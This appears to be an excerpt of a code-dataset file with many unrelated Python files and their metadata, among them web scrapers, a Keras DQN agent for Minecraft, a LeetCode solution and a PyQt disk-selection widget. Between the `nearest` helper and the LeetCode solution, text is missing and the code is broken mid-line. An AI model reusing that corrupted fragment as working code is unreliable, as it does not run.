has_more_items was false but there were more items\n next_pointer = tweets_obj[\"min_position\"]\n html = tweets_obj[\"items_html\"]\n print(\"html,\", html)\n soup = BeautifulSoup(html, 'lxml')\n searched_tweet_ids,tweet_count,replies1, retweets1, likes1 = get_this_page_tweets(soup,searched_tweet_ids)\n replies += replies1\n retweets += retweets1\n likes += likes1\n else:\n print(\"\\nNo more tweets returned\")\n break\n \n return tweet_count, replies, retweets, likes\n \nproxy_pool = get_proxies(proxy_url='https://free-proxy-list.net/')\n \ndef start(tweet_id = None):\n url = 'https://twitter.com/search?q=https://twitter.com/trt2tv/status/'+tweet_id+'&src=typed_query'\n response = None\n \n # Crawl data of the quote tweets of one tweet. In case \"get_tweets_data\" somehow returns\n # 0 for all values, the embedded function \"incase\" tries again at most \n # 25 times to find quote tweet data with a recursive call to itself.\n \n def incase(url,response,retry):\n \n try:\n response = requests.get(url, headers = {'User-Agent': 'Mozilla/5.0'}) #headers=header) \n except Exception as e:\n print(repr(e))\n sys.exit(1)\n \n if response.status_code != 200:\n print(\"Non success status code returned \"+str(response.status_code))\n sys.exit(1)\n \n soup = BeautifulSoup(response.text, 'lxml')\n \n if soup.find(\"div\", {\"class\": \"errorpage-topbar\"}):\n print(\"\\n\\n Error: Invalid username.\")\n sys.exit(1)\n \n #print('my_url', url)\n tweet_count,replies, retweets, likes = get_tweets_data(tweet_id, soup)\n \n # recursive call to function if there is no quote_tweets. It could be that \n # there actually is no quote tweets, or more likely that something went wrong with\n # get_tweets_data function\n \n if tweet_count == 0 and retry > 0:\n return incase(url,response,retry-1)\n \n return tweet_count,replies, retweets, likes\n \n #print(\"%s\" % tweet_id + \" has \", tweet_count,\" quote tweets. The quote tweets have \", replies, \" replies, \", retweets, \" retweets and \", likes, \"likes\")\n \n return incase(url,response, 25)\n \n\n","sub_path":"get_quote_dataframe.py","file_name":"get_quote_dataframe.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18362562","text":"from __future__ import division\ndef average(li):\n sum=0\n for i in li :\n sum+=i\n return sum/len(li)\n\ndef nearest(average,li):\n mi=99999999\n mi_el=0\n for i in li:\n if abs(average-i) int:\n if k == 0 or s == \"\": return 0\n buffer = dict()\n p1 = 0\n res = 0\n for i in range(len(s)):\n if s[i] not in buffer: buffer[s[i]] = 0\n buffer[s[i]] += 1\n \n while(len(buffer) > k):\n if buffer[s[p1]] > 1: buffer[s[p1]] -= 1\n else: del buffer[s[p1]]\n p1 += 1\n \n res = max(res, i-p1+1)\n return res\n","sub_path":"LC340-Longest_substring_with_k_distinct.py","file_name":"LC340-Longest_substring_with_k_distinct.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432232372","text":"from __future__ import print_function, division, absolute_import\n\nimport numpy\nimport random \n\nimport sys\n\n\n\nimport skimage.transform\nimport matplotlib.pyplot as plt\n\n\n\ndef rot_gt(gt, a):\n fgt = gt.astype(numpy.float32)\n mi,ma = fgt.min(), fgt.max()\n fgt -= mi \n fgt /= (ma - mi)\n\n rot = skimage.transform.rotate(fgt,int(a), order=0)\n rot = numpy.clip(rot, 0.0, 1.0)\n rot *= (ma - mi)\n rot += mi\n return rot\n\ndef make_toy_dataset(shape=None, n_images=20, noise=1.0):\n imgs = []\n gts = []\n if shape is None:\n shape = (20, 20)\n for i in range(n_images):\n\n gt_img = numpy.zeros(shape)\n gt_img[0:shape[0]//2,:] = 1\n\n #gt_img[shape[0]//4: 3*shape[0]//4, shape[0]//4: 3*shape[0]//4] = 2\n\n ra = numpy.random.randint(180)\n #print ra \n gt_img = rot_gt(gt_img, ra)\n\n\n # plt.imshow(gt_img)\n # plt.show()\n\n img = gt_img + (numpy.random.random(shape)-0.5)*float(noise)\n\n # plt.imshow(img.squeeze())\n # plt.show()\n\n imgs.append(img.astype('float32'))\n gts.append(gt_img.astype('uint8'))\n\n return imgs, gts\n","sub_path":"exercise05/solution-thorsten/tools/toy_dataset.py","file_name":"toy_dataset.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"644359879","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.3.dev0'\n\nsetup(name='Products.directory',\n version=version,\n description=\"Manage generic directories\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n ],\n keywords='',\n author='',\n author_email='',\n url='http://svn.communesplone.org/svn/communesplone/Products.directory',\n license='GPL',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['Products'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'Products.CMFPlone',\n # -*- Extra requirements: -*-\n 'tecnoteca.googlemap',\n 'plone.api',\n 'z3c.table',\n 'plone.z3ctable',\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n 'testfixtures',\n 'tecnoteca.googlemap',\n ]\n },\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647884613","text":"# -*- python -*-\n#\n# This file is part of bioservices software\n#\n# Copyright (c) 2013-2014 - EBI-EMBL\n#\n# File author(s):\n# Thomas Cokelaer \n# \n#\n# Distributed under the GPLv3 License.\n# See accompanying file LICENSE.txt or copy at\n# http://www.gnu.org/licenses/gpl-3.0.html\n#\n# website: https://github.com/cokelaer/bioservices\n# documentation: http://packages.python.org/bioservices\n#\n##############################################################################\n#$Id$\n\"\"\"Interface to some part of the UniProt web service\n\n.. topic:: What is UniProt ?\n\n :URL: http://www.uniprot.org\n :Citation:\n\n .. highlights::\n\n \"The Universal Protein Resource (UniProt) is a comprehensive resource for protein\n sequence and annotation data. The UniProt databases are the UniProt\n Knowledgebase (UniProtKB), the UniProt Reference Clusters (UniRef), and the\n UniProt Archive (UniParc). The UniProt Metagenomic and Environmental Sequences\n (UniMES) database is a repository specifically developed for metagenomic and\n environmental data.\"\n\n -- From Uniprot web site (help/about) , Dec 2012\n\n\n.. mapping between uniprot and bunch of other DBs.\n.. ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/idmapping/\n.. http://www.uniprot.org/docs/speclist\n.. http://www.uniprot.org/docs/pkinfam\n\n\"\"\"\nfrom services import REST\nfrom xmltools import readXML\n__all__ = [\"BioCarta\"]\n\n\nclass BioCarta(REST):\n \"\"\"Interface to `BioCarta `_ pages\n\n\n This is not a REST interface actually but rather a parser to some of the\n HTML pages relatd to pathways.\n\n One can retrieve the pathways names and their list of proteins.\n\n >>> from bioservics import *\n >>> b = BioCarta()\n >>> pathways = b.get_pathway_names()\n >>> proteins = b.get_pathway_protein_names(pathways[0])\n\n\n .. warning:: biocarta pathways layout can be accesses from PID\n\n \"\"\"\n _url = \"http://www.biocarta.com/\"\n def __init__(self, verbose=True):\n \"\"\"**Constructor**\n\n :param verbose: set to False to prevent informative messages\n \"\"\"\n super(BioCarta, self).__init__(name=\"BioCarta\", url=BioCarta._url, verbose=verbose)\n self.fname = \"biocarta_pathways.txt\"\n\n self._allPathwaysURL = \"http://www.biocarta.com/genes/allPathways.asp\"\n\n def get_pathway_names(self, startswith=\"\"):\n \"\"\"returns pathways from biocarta\n\n all human and mouse. can perform a selectiom\n \"\"\"\n x = readXML(self._allPathwaysURL)\n pathways = [this.get(\"href\") for this in x.findAll(\"a\") if \"pathfiles\" in this.get(\"href\")]\n pathways = [str(xx.split(\"/\")[-1]) for xx in pathways] # split the drive\n pathways = sorted(list(set(pathways)))\n pathways = [xx for xx in pathways if xx.startswith(startswith)]\n return pathways\n\n def get_pathway_protein_names(self, pathway):\n \"\"\"returns list of list. Each elements is made of 3 items: gene name,\n locusId and accession (often empty\n\n Requires to parse HTML page such as\n http://www.biocarta.com/pathfiles/m_actinYPathway.asp\n\n to figure out the URL that would pop up if we press the protein list\n button. For instance:\n\n http://www.biocarta.com/pathfiles/PathwayProteinList.asp?showPFID=175\n\n but now we need to parse the HTML, which is not necessaray very robust.\n THere are many tables and we want to access one that is a children of\n another... Finally, We scan the table for tr and td tags.\n\n The most difficult is to find the good table which is hardcoded to be\n the third that contains a th[0] == \"Gene name\". Although there is only\n one, 3 are returned due probably to an error in the parsing or the HTMl\n file itself. To be checked and made more robust.\n\n \"\"\"\n url = self._url + \"/pathfiles/\" + pathway\n x = readXML(url)\n self.logging.info(\"Reading \" + url)\n protein_url = [this.get(\"href\") for this in x.findAll(\"a\") \\\n if 'href' in this and \"Protein\" in this.get(\"href\")]\n if len(protein_url) == 0:\n return None\n else:\n link = protein_url[0]\n link = link.split(\"/pathfiles/\")[-1]\n link = str(link) # get rid of unicode ?\n link = link.strip(\"')\")\n url = self._url + \"/pathfiles/\" + link\n self.logging.info(\"Reading \" + url)\n x = readXML(url)\n\n # seems to work\n table = [this for this in x.findAll(\"table\") if this.findAll(\"th\")\n and this.findAll(\"th\")[0].getText() == \"Gene Name\"][2]\n # now get the genename, locus and accession\n rows = [[y.getText() for y in xx.findAll(\"td\")] for xx in table.findAll(\"tr\")]\n rows = [xx for xx in rows if len(x)]\n return rows\n","sub_path":"src/bioservices/biocarta.py","file_name":"biocarta.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509017940","text":"from bs4 import BeautifulSoup\nimport pickle as pk\nimport requests\nimport re\nimport spacy\nnlp = spacy.load(\"en_core_web_sm\")\nimport geograpy\nimport nltk\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('maxent_ne_chunker')\nnltk.download('words')\n\ninstitute_keywords = [\n 'unive',\n 'colle',\n 'hosp',\n 'labor',\n 'insti',\n 'founda',\n 'centr',\n 'cente',\n 'clinic',\n 'depart',\n 'health',\n 'servi',\n 'assoc',\n 'organi',\n 'allia',\n 'socie',\n 'resear',\n 'corpor',\n 'pharm',\n 'facult',\n 'school',\n 'grupo',\n 'biolog',\n 'infirm',\n 'ltd',\n 'samsung',\n 'nvidia'\n]\n\ndef extract_affiliation_short_name(title):\n words = re.split('[^\\w\\s\\']', title)\n for keyword in institute_keywords:\n result = [word for word in words if re.search(keyword, word.strip().lower())]\n if len(result) > 0:\n result = result[-1].strip()\n return result\n \n return None\n\nclass Author():\n def __init__(self):\n self.name = str\n self.affiliation_long_name = str\n self.affiliation_short_name = str\n self.affiliation_country = str\n\nclass Article():\n def __init__(self):\n self.id = int\n self.url = str\n self.title = str\n self.year = int\n self.keywords = []\n self.authors = []\n\nclass ArticleCollection():\n def __init__(self):\n self.articles = dict()\n\n def load_years(self, years_list):\n self.processed_pages = dict()\n for year in years_list:\n self.processed_pages[year] = []\n self.current_year = years_list[0]\n\n def get_article_data(self, article_link):\n no_keywords = False\n no_authors = False\n\n r = requests.get(article_link)\n souped = BeautifulSoup(r.content.decode('utf-8'), features='html.parser')\n article = Article()\n article.url = article_link\n id = int(souped.find('strong', attrs={'title': 'PubMed ID'}).text)\n article.id = id\n article.title = souped.find('h1', attrs={'class': 'heading-title'}).text.strip()\n\n pub_date = souped.find('span', attrs={'class': 'cit'}).text.strip().split(';')[0]\n article.year = int(re.findall('\\d{4}', pub_date)[0])\n\n authors_list = souped.find('div', attrs={'class': 'authors-list'})\n authors = []\n if authors_list != None:\n authors_in_article = authors_list.find_all('span', attrs={'class': 'authors-list-item'})\n\n for author_i in authors_in_article:\n author = Author()\n author_data = author_i.find('a', attrs={'class': 'full-name'})\n if author_data != None:\n affiliation_data = author_i.find_all('a', attrs={'class': 'affiliation-link'})\n\n author.name = author_data['data-ga-label']\n\n if len(affiliation_data) > 0:\n affiliation = affiliation_data[0] # En caso de tener más de 1 afiliación, tomamos la primera\n title = affiliation['title']\n author.affiliation_long_name = title\n doc = nlp(title)\n\n author.affiliation_short_name = extract_affiliation_short_name( title )\n\n places = [re.sub('[^\\w\\s]', '', str(ent)) for ent in doc.ents if ent.label_ == 'GPE' ]\n places = ['United States' if place =='USA' else place for place in places]\n places = ['United Kingdom' if place =='UK' else place for place in places]\n places = geograpy.places.PlaceContext(places)\n if len(places.countries) > 0:\n author.affiliation_country = places.countries[0]\n elif len(places.other) > 0:\n author.affiliation_country = places.other[0]\n \n if author.affiliation_short_name != None:\n authors.append(author)\n else:\n print('Affiliation missed:', author.affiliation_long_name)\n\n article.authors = authors\n if len(authors) == 0:\n no_authors = True\n\n keywords = souped.find('strong', string='\\n Keywords:\\n ')\n if keywords != None:\n keywords = keywords.next_sibling.strip().split(';')\n keywords = [re.sub( ' +', ' ', re.sub('[^\\w\\s]', ' ', keyword.strip()) ) for keyword in keywords ]\n article.keywords = keywords\n else:\n no_keywords = True\n\n if no_keywords:\n return 'skipped - no keywords'\n elif no_authors:\n return 'skipped - no authors'\n else:\n self.articles[id] = article\n return 'passed'\n \n def save(self, filename):\n with open(filename, 'wb') as output:\n pk.dump(self.__dict__, output, pk.HIGHEST_PROTOCOL)\n\n def load(self, filename):\n with open(filename, 'rb') as input:\n tmp_dict = pk.load(input)\n self.__dict__.update(tmp_dict)","sub_path":"data-processing/Article.py","file_name":"Article.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208042158","text":"import pandas as pd\nimport seaborn as sns\n\ndata_file = pd.ExcelFile(\n \"/Users/hughesn/Transcripts/RNA-Seq/Analysis/Data/diff_from_col0:False_onlyDiff:False.xlsx\")\nsheet_names = data_file.sheet_names\n\ndfs = []\nfor s in sheet_names:\n d = data_file.parse(s)\n d['sample'] = s.split(\"|\")[0].replace(\" \", \"\")\n dfs.append(d)\n\ndf = pd.concat(dfs)\n\ndf = df.rename_axis('gene').sort_values(\n by=['gene', 'log2FoldChange'], ascending=[False, False])\n\nbottom = df.iloc[:len(sheet_names)*20]\n\n\nbottom = bottom.pivot(columns='sample', values='log2FoldChange')\n# bottom['Control'] = 0\nsns.clustermap(bottom, cmap='bwr', z_score=0)\nplt.show()\n\n# top = df.iloc[-20:-1]\n","sub_path":"Python/analyse_data.py","file_name":"analyse_data.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290990185","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\n\n\n\ntry:\n oldLink = \"http://suninjuly.github.io/selects1.html\"\n link = \"http://suninjuly.github.io/selects2.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n num1 = (int)(browser.find_element(By.XPATH, \"//span[@id='num1']\").text)\n num2 = (int)(browser.find_element(By.XPATH, \"//span[@id='num2']\").text)\n browser.find_element(By.XPATH, \"//select[@id='dropdown']\").click()\n select=Select(browser.find_element_by_tag_name(\"select\"))\n select.select_by_visible_text((str)(num1+num2))\n\n # Отправляем заполненную форму\n button = browser.find_element(By.XPATH, \"//button\")\n button.click()\n\nfinally:\n # ожидание чтобы визуально оценить результаты прохождения скрипта\n time.sleep(5)\n # закрываем браузер после всех манипуляций\n browser.quit()","sub_path":"stepik_02_02_03.py","file_name":"stepik_02_02_03.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222980327","text":"import marlo\r\nimport numpy as np\r\nimport random\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D,Flatten, AveragePooling2D\r\nfrom collections import deque\r\nfrom keras.models import model_from_yaml\r\nfrom matplotlib import pyplot as plt\r\nfrom past.utils import old_div # tutorial 5\r\nimport MalmoPython\r\nimport sys\r\nimport utils\r\nimport csv\r\nfrom time import sleep\r\n\r\nimport pdb\r\nfrom keras.backend import manual_variable_initialization\r\n\r\n\r\n# Notes:\r\n# env.action_space.sample() gives a random action from those available, applies to any env\r\n# TODO The loaded model seems to always give action 2 as the best one. I suspsect this is n issue with the loading as the model performes better after a period of training\r\n# I've checked that the model correctly pulls in weights so it can't be that.\r\n# TODO to make best use of the DQN I need to use an LTSM or stack previous game frames before sending them to the NN. See the deepmind atari paper or hausknecht and stone 2015\r\n# TODO info data contains the orientation and position of the agent, could use this as a feature to train the nn. That might be best as a separate nn that takes in the history of actions taken How does it deal with the straint position being none zero, how does it deal with the maps changing?\r\n# L Even just having the NN output the position it thinks its in would be a useful thing to train. What other features are valuable to extract from the images?\r\n# TODO consider transfer learining from pretrained CNN\r\n# TODO Ben: Create method to rotate the floor grid by the yaw as a function\r\n# TODO Johnny: Create method to do 5 turns in a given direction rather than one\r\n# TODO Matt: Adapt the NN to output the floor grid as well as the q-values.\r\n\r\n\r\ndef trainAgent(env, agent):\r\n # Amount of steps till stop\r\n goal_steps = 100\r\n # How many games to train over\r\n initial_games = 10000\r\n # Batch for back-propagation\r\n batch_size = 16\r\n scores = deque(maxlen=50)\r\n results = []\r\n # Loop over the games initialised\r\n for i in range(initial_games):\r\n reward = 0\r\n game_score = 0\r\n # Short wait required to prevent loss of connection to marlo\r\n sleep(2)\r\n env.reset()\r\n state = env.last_image\r\n # For each step of taken action\r\n for j in range(goal_steps):\r\n print(\"Starting goal step: \", j + 1, \" of game: \", i + 1, \" avg score: \", np.mean(scores))\r\n action = agent.act(state)\r\n # Receive the outcome of the action\r\n new_state, reward, done, info = env.step(action)\r\n\r\n\r\n # Adds this image and action to memory\r\n agent.memory.append((state,action, reward, new_state, done))\r\n\r\n if done:\r\n # Score is the scores for finished games\r\n print(\"Game: \",i ,\" complete, score: \" , game_score,\" last 50 scores avg: \", np.mean(scores), \" epsilon \", agent.epsilon)\r\n scores.append(game_score)\r\n break\r\n game_score += reward\r\n state = new_state\r\n oldInfo = info\r\n\r\n # This memory is the last seen game images\r\n if len(agent.memory) > batch_size:\r\n # Find a random batch from the memory\r\n randomBatch = random.sample(agent.memory, batch_size)\r\n # Perform backpropagation\r\n agent.replay(randomBatch)\r\n\r\n results.append([game_score,j,oldInfo['observation']['TotalTime'], agent.epsilon])\r\n # Save results so far\r\n with open(agent.CSVName,\"w\") as f:\r\n wr = csv.writer(f)\r\n wr.writerows(results)\r\n # Decay the epsilon until the minimum\r\n if agent.epsilon > agent.epsilon_min:\r\n agent.epsilon *= agent.epsilon_decay\r\n else:\r\n agent.epsilon = 0\r\n # Update the storage of the model\r\n model_yaml = agent.model.to_yaml()\r\n with open(\"model.yaml\", \"w\") as yaml_file:\r\n yaml_file.write(model_yaml)\r\n # Save the weights of the model\r\n agent.model.save_weights('model_weights.h5')\r\n\r\n return scores\r\n\r\ndef testAgent(env, agent):\r\n goal_steps = 500\r\n initial_games = 50\r\n scores = deque(maxlen=50)\r\n for i in range(initial_games):\r\n reward = 0\r\n game_score = 0\r\n env.reset()\r\n state = env.last_image\r\n for j in range(goal_steps):\r\n action = agent.act(state)\r\n print(\"Starting goal step: \", j, \" of game: \", i, \" avg score: \", np.mean(scores), \" action: \", action)\r\n new_state, reward, done, info = env.step(action)\r\n #pdb.set_trace()\r\n if done:\r\n print(\"Game: \",i ,\" complete, score: \" , game_score,\" last 50 scores avg: \", np.mean(scores), \" epsilon \", agent.epsilon)\r\n scores.append(game_score)\r\n break\r\n game_score += reward\r\n state = new_state\r\n return scores\r\n\r\nclass agent:\r\n def __init__(self, observation_shape, action_size, block_map_shape, load_model_file = False, epsilon = 1.0):\r\n # Initialise parameters for the agent\r\n self.observation_shape = observation_shape\r\n self.action_size = action_size\r\n self.block_list = ['air','cobblestone','stone','gold_block']\r\n self.block_vision_size = len(self.block_list) * block_map_shape[0] * block_map_shape[1]\r\n self.memory = deque(maxlen=2000)\r\n self.gamma = 1.0 # discount rate\r\n self.epsilon_min = 0.01\r\n self.epsilon = epsilon\r\n self.epsilon_decay = 0.999\r\n self.learning_rate = 0.5\r\n self.CSVName = 'dqn_bot_results.csv'\r\n\r\n if load_model_file:\r\n # If you want to load a previous model\r\n # This is required to stop tensorflow reinitialising weights on model load\r\n #manual_variable_initialization(True)\r\n #self.model = load_model('model.h5')\r\n #self.model.load_weights('model.h5')\r\n yaml_file = open('model.yaml', 'r')\r\n loaded_model_yaml = yaml_file.read()\r\n yaml_file.close()\r\n self.model = model_from_yaml(loaded_model_yaml)\r\n self.model.load_weights('model_weights.h5')\r\n self.model.compile(loss='mse', optimizer='rmsprop')\r\n else:\r\n # Start from scratch\r\n self.model = self.create_model()\r\n\r\n def create_model(self):\r\n model = Sequential()\r\n # Need to check that this is processing the colour bands correctly <- have checked this and:\r\n # the default is channels last which is what we have\r\n\r\n # This max pooling layer is quite extreme because of memory limits on machine\r\n model.add(AveragePooling2D(pool_size=(8, 8), input_shape=(self.observation_shape)))\r\n\r\n model.add(Conv2D(32, 8, 4)) # Convolutions set to same as in Lample and Chaplet\r\n model.add(Conv2D(64, 4, 2)) # Convolutions set to same as in Lample and Chaplet\r\n\r\n # Flatten needed to get a single vector as output otherwise get a matrix\r\n model.add(Flatten())\r\n model.add(Dense(128,activation='relu'))\r\n model.add(Dense(64,activation='relu'))\r\n model.add(Dense(self.action_size,activation='linear'))\r\n model.compile(loss='mse', optimizer='rmsprop')\r\n return model\r\n\r\n def act(self, state):\r\n # Randomly choose to take a randomly chosen action to allow exploration\r\n # When epsilon is high, higher chance, therefore decrease it overtime\r\n # This then results in exploration early on with greater exploitation later\r\n if np.random.rand() <= self.epsilon:\r\n print(\"Random Action\")\r\n return random.randrange(self.action_size)\r\n act_values = self.model.predict(state.reshape([-1, 600, 800, 3]))\r\n return np.argmax(act_values[0])\r\n\r\n def replay(self, batch):\r\n # This is how the agent is trained\r\n x_train = []\r\n y_train = []\r\n for state, action, reward, newState, done in batch:\r\n if done:\r\n # If finished\r\n # Set the reward for finishing the game\r\n target_q = reward\r\n else:\r\n # If not finished\r\n #pdb.set_trace()\r\n #self.model.predict(newState.reshape([-1, 600, 800, 3]))\r\n\r\n # Bellman equation - use the estimates of the\r\n # Recalling what happened, not what could happen\r\n # Target_Q is the ground truth Y\r\n target_q = reward + self.gamma * np.amax(self.model.predict(newState.reshape([-1, 600, 800, 3])))\r\n\r\n # prediction is prediction_q\r\n # prediction has the 5 actions and predicted q-values\r\n prediction = self.model.predict(state.reshape([-1, 600, 800, 3]))\r\n # update the certain action that we did take with a better target, from above\r\n prediction[0][action] = target_q\r\n\r\n # Create the training data for X and Y that we use to fit the CNN on\r\n x_train.append(state)\r\n y_train.append(prediction[0])\r\n\r\n # Use the training data to fit the model, via the batch\r\n self.model.fit(np.asarray(x_train),np.asarray(y_train),epochs=1,verbose=0)\r\n return\r\n\r\n def blockEncoder(floorList):\r\n # We need to convert the block names from strings to vectors as they are categorical data\r\n # takes in a i-length list of the blocks with j different block types and returns an i*j length list indicating the encoded version.\r\n blockList = self.blockList\r\n # TODO need to simplfy the classes to classify these under a type of: air, goal, solid, danger (lava)\r\n blockDict = {}\r\n for i,block in enumerate(blockList):\r\n blockDict[block] = np.zeros(len(blockList))\r\n blockDict[block][i] = 1\r\n\r\n vectorisedList = []\r\n for i in floorList:\r\n # Adds content of list to other list. N.B. we might want to use append here depending on how we handle the data\r\n vectorisedList.extend(blockDict[i])\r\n return vectorisedList\r\n\r\ndef loadMissionFile(filename):\r\n with open(filename, 'r') as file:\r\n missionXML = file.read()\r\n return missionXML\r\n\r\ndef main():\r\n if len(sys.argv) > 1:\r\n env = utils.setupEnv(sys.argv[1])\r\n else:\r\n env = utils.setupEnv()\r\n\r\n # Get the number of available states and actions - generates the output of CNN\r\n observation_shape = env.observation_space.shape\r\n action_size = env.action_space.n\r\n #pdb.set_trace()\r\n # Can start from a pre-built model\r\n #load = input(\"Load model? y/n or an epsilon value to continue: \")\r\n block_map_shape = (4,4,3)\r\n myagent = agent(observation_shape, action_size,block_map_shape)\r\n #pdb.set_trace()\r\n scores = trainAgent(env, myagent)\r\n '''\r\n if load == 'y':\r\n myagent = agent(observation_shape, action_size, block_map_shape,True,0.1)\r\n #pdb.set_trace()\r\n scores = testAgent(env,myagent)\r\n elif load == 'n':\r\n myagent = agent(observation_shape, action_size,block_map_shape)\r\n #pdb.set_trace()\r\n scores = trainAgent(env, myagent)\r\n else:\r\n #TODO - how come the 'epsilon value' runs still load a model??\r\n myagent = agent(observation_shape, action_size, block_map_shape,True,float(load))\r\n scores = trainAgent(env,myagent)\r\n '''\r\n np.savetxt('dqn_botscores',np.array(scores))\r\n #plt.plot(scores)\r\n #plt.show()\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"dqn_bot.py","file_name":"dqn_bot.py","file_ext":"py","file_size_in_byte":11694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"539012154","text":"# -*- coding: utf-8 -*-\n#IStandForFreedom\nfrom osv import osv, fields\n\n\nclass archivos(osv.Model):\n _name = 'document.archivos'\n _columns = {\n 'archivo_id': fields.integer('Secuencia'),\n 'nom_archivo': fields.char('Nombre de archivo'),\n 'ver_archivo': fields.char('Version', size=10)\n }\n\n\nclass cuestionarios(osv.Model):\n _name = 'document.cuestionarios'\n _description = 'Tabla para registro de cuestionarios'\n _columns = {\n 'nom_estudio_id': fields.many2one('project.arranques',\n 'Nombre del estudio'),\n 'arch_cuestionario': fields.binary('Subir cuestionario'),\n 'nom_responsable_id': fields.many2one('hr.employee',\n 'Responsable'),\n 'responsable': fields.date('Fecha de solicitud'),\n 'archivo_ids': fields.one2many('document.archivos',\n 'archivo_id', 'Archivos'),\n 'state': fields.selection((('nuevo', 'Nuevo'),\n ('revisado', 'Revisado'), ('aprobado', 'Aprobado')), 'Estado'),\n }\n","sub_path":"estadistica_aplicada2/encuestas/cuestionarios.py","file_name":"cuestionarios.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"336905663","text":"#!/usr/bin/env python3\n\n\"\"\"\nLets the user select a disk to format.\n\"\"\"\n\nimport sys\nimport gettext\nimport locale\nimport os\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nimport disks\n\n# Translate this application using Qt .ts files without the need for compilation\nimport tstranslator\n# FIXME: Do not import translations from outside of the application bundle\n# which currently is difficult because we have all translations for all applications\n# in the whole repository in the same .ts files\ntstr = tstranslator.TsTranslator(os.path.dirname(__file__) + \"/i18n\", \"\")\ndef tr(input):\n return tstr.tr(input)\n\n\nclass DiskSelectionWidget(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.user_agreed_to_erase = False\n self.selected_disk = None\n\n self.old_ds = None # The disks we have recognized so far\n self.disk_listwidget = QtWidgets.QListWidget()\n self.disk_listwidget.setIconSize(QtCore.QSize(48, 48))\n self.disk_listwidget.itemSelectionChanged.connect(self.onSelectionChanged)\n disk_vlayout = QtWidgets.QVBoxLayout(self)\n disk_vlayout.addWidget(self.disk_listwidget)\n self.label = QtWidgets.QLabel()\n disk_vlayout.addWidget(self.label)\n self.required_mib_on_disk = 0\n self.periodically_list_disks()\n\n # Add a ButtonBox with an OK button and a Cancel button\n self.button_box = QtWidgets.QDialogButtonBox()\n self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel)\n # Cancel button is the default (blue button)\n self.button_box.button(QtWidgets.QDialogButtonBox.Cancel).setDefault(True)\n # button_box.setCenterButtons(True)\n self.button_box.accepted.connect(self.accept)\n self.button_box.rejected.connect(self.reject)\n # Disable the OK button until the user has selected a disk\n self.button_box.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False)\n disk_vlayout.addWidget(self.button_box)\n\n # When user presses escape, close the dialog box\n self.shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Esc\"), self)\n self.shortcut.activated.connect(self.reject)\n\n # When user presses enter, simulate a click on the OK button\n self.shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Return\"), self)\n self.shortcut.activated.connect(self.accept)\n \n # Start a timer to periodically refresh the list of disks\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.periodically_list_disks)\n self.timer.start(1000)\n\n def accept(self):\n if self.user_agreed_to_erase == True:\n self.timer.stop()\n self.close()\n\n def reject(self):\n self.timer.stop()\n self.close()\n\n def periodically_list_disks(self):\n print(\"periodically_list_disks\")\n self.list_disks()\n\n def list_disks(self):\n ds = disks.get_disks()\n # Do not refresh the list of disks if nothing has changed, because it de-selects the selection\n if ds != self.old_ds:\n self.disk_listwidget.clear()\n for d in ds:\n di = disks.get_disk(d)\n available_bytes = int(di.get(\"mediasize\").split(\" \")[0])\n if (available_bytes >= self.required_mib_on_disk) and di.get(\"geomname\").startswith(\"cd\") == False:\n title = \"%s on %s (%s GiB)\" % (di.get(\"descr\"), di.get(\"geomname\"), f\"{(available_bytes // (2 ** 30)):,}\")\n if di.get(\"geomname\").startswith(\"cd\") == True:\n item = QtWidgets.QListWidgetItem(QtGui.QIcon.fromTheme('drive-optical'), title)\n elif di.get(\"geomname\").startswith(\"da\") == True:\n item = QtWidgets.QListWidgetItem(QtGui.QIcon.fromTheme('drive-removable-media'), title)\n else:\n item = QtWidgets.QListWidgetItem(QtGui.QIcon.fromTheme('drive-harddisk'), title)\n item.setFlags(QtCore.Qt.ItemIsSelectable)\n if 